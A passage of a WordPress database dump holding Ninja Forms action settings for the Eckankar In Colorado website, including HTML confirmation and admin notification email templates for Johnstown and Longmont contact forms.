Form'),(1347,53,'objectType','Action','objectType','Action'),(1348,53,'objectDomain','actions','objectDomain','actions'),(1349,53,'editActive','','editActive',''),(1350,53,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1351,53,'payment_gateways','','payment_gateways',''),(1352,53,'payment_total','0','payment_total','0'),(1353,53,'tag','','tag',''),(1354,53,'to','{wp:admin_email}','to','{wp:admin_email}'),(1355,53,'reply_to','','reply_to',''),(1356,53,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1357,53,'email_message','{fields_table}','email_message','{fields_table}'),(1358,53,'email_message_plain','','email_message_plain',''),(1359,53,'from_name','','from_name',''),(1360,53,'from_address','','from_address',''),(1361,53,'email_format','html','email_format','html'),(1362,53,'cc','','cc',''),(1363,53,'bcc','','bcc',''),(1364,53,'redirect_url','','redirect_url',''),(1365,53,'parent_id','14','parent_id','14'),(1366,54,'title','','title',''),(1367,54,'key','','key',''),(1368,54,'type','email','type','email'),(1369,54,'active','1','active','1'),(1370,54,'created_at','2018-01-03 12:34:29','created_at','2018-01-03 12:34:29'),(1371,54,'date_updated','2016-01-15','date_updated','2016-01-15'),(1372,54,'attach_csv','0','attach_csv','0'),(1373,54,'email_format','html','email_format','html'),(1374,54,'reply_to','','reply_to',''),(1375,54,'cc','','cc',''),(1376,54,'bcc','','bcc',''),(1377,54,'redirect_url','','redirect_url',''),(1378,54,'success_msg','','success_msg',''),(1379,54,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1380,54,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1381,54,'to','{field:email_1515012046399}','to','{field:email_1515012046399}'),(1382,54,'email_subject','Johnstown Initiators and ESAâs','email_subject','Johnstown Initiators and ESAâs'),(1383,54,'email_message','<p><br><br><br><br><br><br></p><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td>                                \" valign=\"top\"><br><h1>Eckankar In Colorado</h1><br></td><td> </td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p><strong>Hello {field:firstname_1515012036721},</strong></p><br><p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Johnstown ECK Leadership Communications team.</p><br><p>Here is a copy of the information that you have submitted:</p><br></td></tr></tbody></table><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td>                                \" valign=\"top\"><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong><span data-tag=\"{field:firstname_1515012036721}\"> {field:firstname_1515012036721}</span><br><br>   </span><span style=\"color: #333333\"><strong>LAST NAME:</strong><span data-tag=\"{field:lastname_1515012040393}\"> {field:lastname_1515012040393}</span><br><br>   </span><span style=\"color: #333333\"><strong>EMAIL: </strong><span data-tag=\"{field:email_1515012046399}\">{field:email_1515012046399}</span><br><br>   </span><span style=\"color: #333333\"><strong>TELEPHONE: </strong><span data-tag=\"{field:phone_1515012055554}\">{field:phone_1515012055554}</span></span><br><br>   <span style=\"color: #333333\"><strong>LOCAL AREA:</strong><span data-tag=\"{field:your_local_area_1515013258725}\"> {field:your_local_area_1515013258725}</span><br><br>   </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong><span data-tag=\"{field:select_the_person_you_would_like_to_contact_1613166502762}\"> {field:select_the_person_you_would_like_to_contact_1613166502762}</span></span></p><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br></td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br><br> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br></td></tr></tbody></table><br></td></tr></tbody></table><br></td></tr></tbody></table><br><p> </p><p></p>','email_message','<p><br><br><br><br><br><br></p><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td>                                \" valign=\"top\"><br><h1>Eckankar In Colorado</h1><br></td><td> </td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p><strong>Hello {field:firstname_1515012036721},</strong></p><br><p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Johnstown ECK Leadership Communications team.</p><br><p>Here is a copy of the information that you have submitted:</p><br></td></tr></tbody></table><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td>                                \" valign=\"top\"><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong><span data-tag=\"{field:firstname_1515012036721}\"> {field:firstname_1515012036721}</span><br><br>   </span><span style=\"color: #333333\"><strong>LAST NAME:</strong><span data-tag=\"{field:lastname_1515012040393}\"> {field:lastname_1515012040393}</span><br><br>   </span><span style=\"color: #333333\"><strong>EMAIL: </strong><span data-tag=\"{field:email_1515012046399}\">{field:email_1515012046399}</span><br><br>   </span><span style=\"color: #333333\"><strong>TELEPHONE: </strong><span data-tag=\"{field:phone_1515012055554}\">{field:phone_1515012055554}</span></span><br><br>   <span style=\"color: #333333\"><strong>LOCAL AREA:</strong><span data-tag=\"{field:your_local_area_1515013258725}\"> {field:your_local_area_1515013258725}</span><br><br>   </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong><span data-tag=\"{field:select_the_person_you_would_like_to_contact_1613166502762}\"> {field:select_the_person_you_would_like_to_contact_1613166502762}</span></span></p><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br></td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br><br> Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br></td></tr></tbody></table><br></td></tr></tbody></table><br></td></tr></tbody></table><br><p> </p><p></p>'),(1384,54,'label','Send copy to user','label','Send copy to user'),(1385,54,'objectType','Action','objectType','Action'),(1386,54,'objectDomain','actions','objectDomain','actions'),(1387,54,'editActive','','editActive',''),(1388,54,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1389,54,'drawerDisabled','','drawerDisabled',''),(1390,54,'payment_gateways','','payment_gateways',''),(1391,54,'payment_total','0','payment_total','0'),(1392,54,'tag','','tag',''),(1393,54,'email_message_plain','','email_message_plain',''),(1394,54,'parent_id','14','parent_id','14'),(1395,55,'title','','title',''),(1396,55,'key','','key',''),(1397,55,'type','successmessage','type','successmessage'),(1398,55,'active','1','active','1'),(1399,55,'created_at','2018-01-03 12:34:29','created_at','2018-01-03 12:34:29'),(1400,55,'date_updated','2016-01-15','date_updated','2016-01-15'),(1401,55,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1402,55,'from_name','','from_name',''),(1403,55,'from_address','','from_address',''),(1404,55,'to','{wp:admin_email}','to','{wp:admin_email}'),(1405,55,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1406,55,'email_message','{fields_table}','email_message','{fields_table}'),(1407,55,'attach_csv','0','attach_csv','0'),(1408,55,'email_format','html','email_format','html'),(1409,55,'reply_to','','reply_to',''),(1410,55,'cc','','cc',''),(1411,55,'bcc','','bcc',''),(1412,55,'redirect_url','','redirect_url',''),(1413,55,'label','Success Message','label','Success Message'),(1414,55,'objectType','Action','objectType','Action'),(1415,55,'objectDomain','actions','objectDomain','actions'),(1416,55,'editActive','','editActive',''),(1417,55,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1418,55,'payment_gateways','','payment_gateways',''),(1419,55,'payment_total','0','payment_total','0'),(1420,55,'tag','','tag',''),(1421,55,'email_message_plain','','email_message_plain',''),(1422,55,'drawerDisabled','','drawerDisabled',''),(1423,55,'parent_id','14','parent_id','14'),(1424,56,'title','','title',''),(1425,56,'key','','key',''),(1426,56,'type','email','type','email'),(1427,56,'active','1','active','1'),(1428,56,'created_at','2018-01-03 12:34:29','created_at','2018-01-03 12:34:29'),(1429,56,'date_updated','2016-01-19','date_updated','2016-01-19'),(1430,56,'from_name','Johnstown Initiators and ESAâs','from_name','Johnstown Initiators and ESAâs'),(1431,56,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1432,56,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1433,56,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1434,56,'email_message','<br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td><br />\n<br />\n                                \" valign=\"top\"><br><br />\n<h1>Eckankar In Colorado</h1><br />\n<br><br />\n</td><br />\n<br />\n<td> </td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\"><br><br />\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Johnstown Initiators and ESAâs</span> form submission.<br><br />\n  <br><br />\n </strong><br><br><br />\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Johnstown ECK Leadership organization</em>.<br><br><br />\n <strong><br><br><br />\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #333333\">{field:firstname_1515012036721} {field:lastname_1515012040393}</span> has submitted:</strong></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n<br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td><br />\n<br />\n                                \" valign=\"top\"><br><br />\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:firstname_1515012036721}<br><br><br />\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_1515012040393}<br><br><br />\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong><span data-tag=\"{field:email_1515012046399}\"> {field:email_1515012046399}</span><br><br><br />\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_1515012055554}</span><br><br><br />\n <span style=\"color: #333333\"><strong>LOCAL AREA: </strong>{field:your_local_area_1515013258725}<br><br><br />\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166502762}</span></p><br />\n<br><br />\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br />\n<br><br />\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br />\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n<p> </p><br />\n','email_message','<br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td><br />\n<br />\n                                \" valign=\"top\"><br><br />\n<h1>Eckankar In Colorado</h1><br />\n<br><br />\n</td><br />\n<br />\n<td> </td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\"><br><br />\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Johnstown Initiators and ESAâs</span> form submission.<br><br />\n  <br><br />\n </strong><br><br><br />\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Johnstown ECK Leadership organization</em>.<br><br><br />\n <strong><br><br><br />\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #333333\">{field:firstname_1515012036721} {field:lastname_1515012040393}</span> has submitted:</strong></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n<br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td><br />\n<br />\n                                \" valign=\"top\"><br><br />\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:firstname_1515012036721}<br><br><br />\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_1515012040393}<br><br><br />\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong><span data-tag=\"{field:email_1515012046399}\"> {field:email_1515012046399}</span><br><br><br />\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_1515012055554}</span><br><br><br />\n <span style=\"color: #333333\"><strong>LOCAL AREA: </strong>{field:your_local_area_1515013258725}<br><br><br />\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166502762}</span></p><br />\n<br><br />\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n<tr><br />\n<br />\n<td align=\"center\" valign=\"top\"><br><br />\n<br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><br />\n<br />\n<tbody><br />\n<br />\n<tr><br />\n<br />\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br />\n<br><br />\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br />\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n</td><br />\n<br />\n</tr><br />\n<br />\n</tbody><br />\n<br />\n</table><br />\n<br><br />\n<p> </p><br />\n'),(1435,56,'attach_csv','0','attach_csv','0'),(1436,56,'email_format','html','email_format','html'),(1437,56,'reply_to','','reply_to',''),(1438,56,'cc','','cc',''),(1439,56,'bcc','','bcc',''),(1440,56,'redirect_url','','redirect_url',''),(1441,56,'success_msg','','success_msg',''),(1442,56,'label','Admin Email','label','Admin Email'),(1443,56,'objectType','Action','objectType','Action'),(1444,56,'objectDomain','actions','objectDomain','actions'),(1445,56,'editActive','','editActive',''),(1446,56,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1447,56,'payment_gateways','','payment_gateways',''),(1448,56,'payment_total','0','payment_total','0'),(1449,56,'tag','','tag',''),(1450,56,'email_message_plain','','email_message_plain',''),(1451,56,'drawerDisabled','','drawerDisabled',''),(1452,56,'parent_id','14','parent_id','14'),(1453,57,'title','','title',''),(1454,57,'key','','key',''),(1455,57,'type','save','type','save'),(1456,57,'active','1','active','1'),(1457,57,'created_at','2018-01-03 11:44:15','created_at','2018-01-03 11:44:15'),(1458,57,'label','Save Form','label','Save Form'),(1459,57,'objectType','Action','objectType','Action'),(1460,57,'objectDomain','actions','objectDomain','actions'),(1461,57,'editActive','','editActive',''),(1462,57,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1463,57,'payment_gateways','','payment_gateways',''),(1464,57,'payment_total','0','payment_total','0'),(1465,57,'tag','','tag',''),(1466,57,'to','{wp:admin_email}','to','{wp:admin_email}'),(1467,57,'reply_to','','reply_to',''),(1468,57,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1469,57,'email_message','{fields_table}','email_message','{fields_table}'),(1470,57,'email_message_plain','','email_message_plain',''),(1471,57,'from_name','','from_name',''),(1472,57,'from_address','','from_address',''),(1473,57,'email_format','html','email_format','html'),(1474,57,'cc','','cc',''),(1475,57,'bcc','','bcc',''),(1476,57,'redirect_url','','redirect_url',''),(1477,57,'parent_id','15','parent_id','15'),(1478,58,'title','','title',''),(1479,58,'key','','key',''),(1480,58,'type','email','type','email'),(1481,58,'active','1','active','1'),(1482,58,'created_at','2018-01-03 11:44:14','created_at','2018-01-03 11:44:14'),(1483,58,'date_updated','2016-01-15','date_updated','2016-01-15'),(1484,58,'attach_csv','0','attach_csv','0'),(1485,58,'email_format','html','email_format','html'),(1486,58,'reply_to','','reply_to',''),(1487,58,'cc','','cc',''),(1488,58,'bcc','','bcc',''),(1489,58,'redirect_url','','redirect_url',''),(1490,58,'success_msg','','success_msg',''),(1491,58,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1492,58,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1493,58,'to','{field:email_132}','to','{field:email_132}'),(1494,58,'email_subject','Longmont Initiators and ESAâs','email_subject','Longmont Initiators and ESAâs'),(1495,58,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_130},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Longmont ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br 